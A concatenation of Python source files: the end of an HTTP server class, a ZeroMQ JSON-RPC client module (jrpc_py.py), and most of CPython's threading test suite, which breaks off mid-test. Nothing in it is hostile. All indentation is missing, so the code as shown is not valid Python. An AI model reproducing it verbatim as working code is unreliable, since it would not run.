http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
self.started = True
if block:
self.httpd.serve_forever()
else:
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
|
jrpc_py.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import random
import time
import zmq
try:
import queue
except ImportError:
import Queue as queue
import threading
import msgpack
import snappy
import copy
qEmpty = copy.copy(queue.Empty)
def _unpack_msgpack_snappy(str):
if str.startswith(b'S'):
tmp = snappy.uncompress(str[1:])
# print "SNAPPY: ", len(str), len(tmp)
obj = msgpack.loads(tmp, encoding='utf-8')
elif str.startswith(b'\0'):
obj = msgpack.loads(str[1:], encoding='utf-8')
else:
return None
return obj
def _pack_msgpack_snappy(obj):
# print "pack", obj
tmp = msgpack.dumps(obj, encoding='utf-8')
if len(tmp) > 1000:
return b'S' + snappy.compress(tmp)
else:
return b'\0' + tmp
def _unpack_msgpack(str):
return msgpack.loads(str, encoding='utf-8')
def _pack_msgpack(obj):
return msgpack.dumps(obj, encoding='utf-8')
def _unpack_json(str):
return json.loads(str, encoding='utf-8')
def _pack_json(obj):
return json.dumps(obj, encoding='utf-8')
class JRpcClient(object):
def __init__(self, data_format="msgpack_snappy"):
self._waiter_lock = threading.Lock()
self._waiter_map = {}
self._should_close = False
self._next_callid = 0
self._send_lock = threading.Lock()
self._callid_lock = threading.Lock()
self._last_heartbeat_rsp_time = 0
self._connected = False
self.on_disconnected = None
self.on_rpc_callback = None
self._callback_queue = queue.Queue()
self._call_wait_queue = queue.Queue()
self._ctx = zmq.Context()
self._pull_sock = self._ctx.socket(zmq.PULL)
self._pull_sock.bind("inproc://pull_sock")
self._push_sock = self._ctx.socket(zmq.PUSH)
self._push_sock.connect("inproc://pull_sock")
self._heartbeat_interval = 1
self._heartbeat_timeout = 3
self._addr = None
if data_format == "msgpack_snappy":
self._pack = _pack_msgpack_snappy
self._unpack = _unpack_msgpack_snappy
elif data_format == "msgpack":
self._pack = _pack_msgpack
self._unpack = _unpack_msgpack
elif data_format == "json":
self._pack = _pack_json
self._unpack = _unpack_json
else:
assert False, "unknown data_format " + data_format
t = threading.Thread(target=self._recv_run)
t.setDaemon(True)
t.start()
self._recv_thread = t
t = threading.Thread(target=self._callback_run)
t.setDaemon(True)
t.start()
self._callback_thread = t
def __del__(self):
self.close()
def next_callid(self):
self._callid_lock.acquire()
self._next_callid += 1
callid = self._next_callid
self._callid_lock.release()
return callid
def set_heartbeat_options(self, interval, timeout):
self._heartbeat_interval = interval
self._heartbeat_timeout = timeout
def _recv_run(self):
heartbeat_time = 0
poller = zmq.Poller()
poller.register(self._pull_sock, zmq.POLLIN)
remote_sock = None
while not self._should_close:
try:
if self._connected and time.time() - self._last_heartbeat_rsp_time > self._heartbeat_timeout:
self._connected = False
if self.on_disconnected: self._async_call(self.on_disconnected)
if remote_sock and time.time() - heartbeat_time > self._heartbeat_interval:
self._send_hearbeat()
heartbeat_time = time.time()
socks = dict(poller.poll(500))
if self._pull_sock in socks and socks[self._pull_sock] == zmq.POLLIN:
cmd = self._pull_sock.recv()
if cmd == b"CONNECT":
# print time.ctime(), "CONNECT " + self._addr
if remote_sock:
poller.unregister(remote_sock)
remote_sock.close()
remote_sock = None
remote_sock = self._do_connect()
if remote_sock:
poller.register(remote_sock, zmq.POLLIN)
elif cmd.startswith(b"SEND:") and remote_sock:
# print time.ctime(), "SEND " + cmd[5:]
remote_sock.send(cmd[5:])
if remote_sock and remote_sock in socks and socks[remote_sock] == zmq.POLLIN:
data = remote_sock.recv()
if data:
# if not data.find("heartbeat"):
# print time.ctime(), "RECV", data
self._on_data_arrived(data)
except zmq.error.Again as e:
# print "RECV timeout: ", e
pass
except Exception as e:
print("_recv_run:", e)
def _callback_run(self):
while not self._should_close:
try:
r = self._callback_queue.get(timeout=1)
if r:
r()
except qEmpty as e:
pass
except TypeError as e:
if str(e) == "'NoneType' object is not callable":
pass
else:
print("_callback_run {}".format(r), type(e), e)
except Exception as e:
print("_callback_run {}".format(r), type(e), e)
def _async_call(self, func):
self._callback_queue.put(func)
def _send_request(self, json):
try:
self._send_lock.acquire()
self._push_sock.send(b"SEND:" + json)
finally:
self._send_lock.release()
def connect(self, addr):
self._addr = addr
self._push_sock.send_string('CONNECT', encoding='utf-8')
def _do_connect(self):
client_id = str(random.randint(1000000, 100000000))
socket = self._ctx.socket(zmq.DEALER)
identity = (client_id) + '$' + str(random.randint(1000000, 1000000000))
identity = identity.encode('utf-8')
socket.setsockopt(zmq.IDENTITY, identity)
socket.setsockopt(zmq.RCVTIMEO, 500)
socket.setsockopt(zmq.SNDTIMEO, 500)
socket.setsockopt(zmq.LINGER, 0)
socket.connect(self._addr)
return socket
def close(self):
self._should_close = True
self._callback_thread.join()
self._recv_thread.join()
def _on_data_arrived(self, str):
try:
msg = self._unpack(str)
# print "RECV", msg
if not msg:
print("wrong message format")
return
if 'method' in msg and msg['method'] == '.sys.heartbeat':
self._last_heartbeat_rsp_time = time.time()
if not self._connected:
self._connected = True
if self.on_connected:
self._async_call(self.on_connected)
# Let user has a chance to check message in .sys.heartbeat
if 'result' in msg and self.on_rpc_callback:
self._async_call(lambda: self.on_rpc_callback(msg['method'], msg['result']))
elif 'id' in msg and msg['id']:
# Call result
id = int(msg['id'])
if self._waiter_lock.acquire():
if id in self._waiter_map:
q = self._waiter_map[id]
if q: q.put(msg)
self._waiter_lock.release()
else:
# Notification message
if 'method' in msg and 'result' in msg and self.on_rpc_callback:
self._async_call(lambda: self.on_rpc_callback(msg['method'], msg['result']))
except Exception as e:
print("_on_data_arrived:", e)
pass
def _send_hearbeat(self):
msg = {'jsonrpc': '2.0',
'method': '.sys.heartbeat',
'params': {'time': time.time()},
'id': str(self.next_callid())}
json_str = self._pack(msg)
self._send_request(json_str)
def _alloc_wait_queue(self):
self._waiter_lock.acquire()
if self._call_wait_queue:
q = self._call_wait_queue
self._call_wait_queue = None
else:
q = queue.Queue()
self._waiter_lock.release()
return q
def _free_wait_queue(self, q):
self._waiter_lock.acquire()
if not self._call_wait_queue:
self._call_wait_queue = q
else:
del q
self._waiter_lock.release()
def call(self, method, params, timeout=6):
# print "call", method, params, timeout
callid = self.next_callid()
if timeout:
q = self._alloc_wait_queue()
self._waiter_lock.acquire()
self._waiter_map[callid] = q
self._waiter_lock.release()
msg = {'jsonrpc': '2.0',
'method': method,
'params': params,
'id': str(callid)}
# print "SEND", msg
json_str = self._pack(msg)
self._send_request(json_str)
if timeout:
ret = {}
try:
r = q.get(timeout=timeout)
q.task_done()
except qEmpty:
r = None
self._waiter_lock.acquire()
self._waiter_map[callid] = None
self._waiter_lock.release()
self._free_wait_queue(q)
if r:
if 'result' in r:
ret['result'] = r['result']
if 'error' in r:
ret['error'] = r['error']
return ret if ret else {'error': {'error': -1, 'message': "timeout"}}
else:
return {'result': True}
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
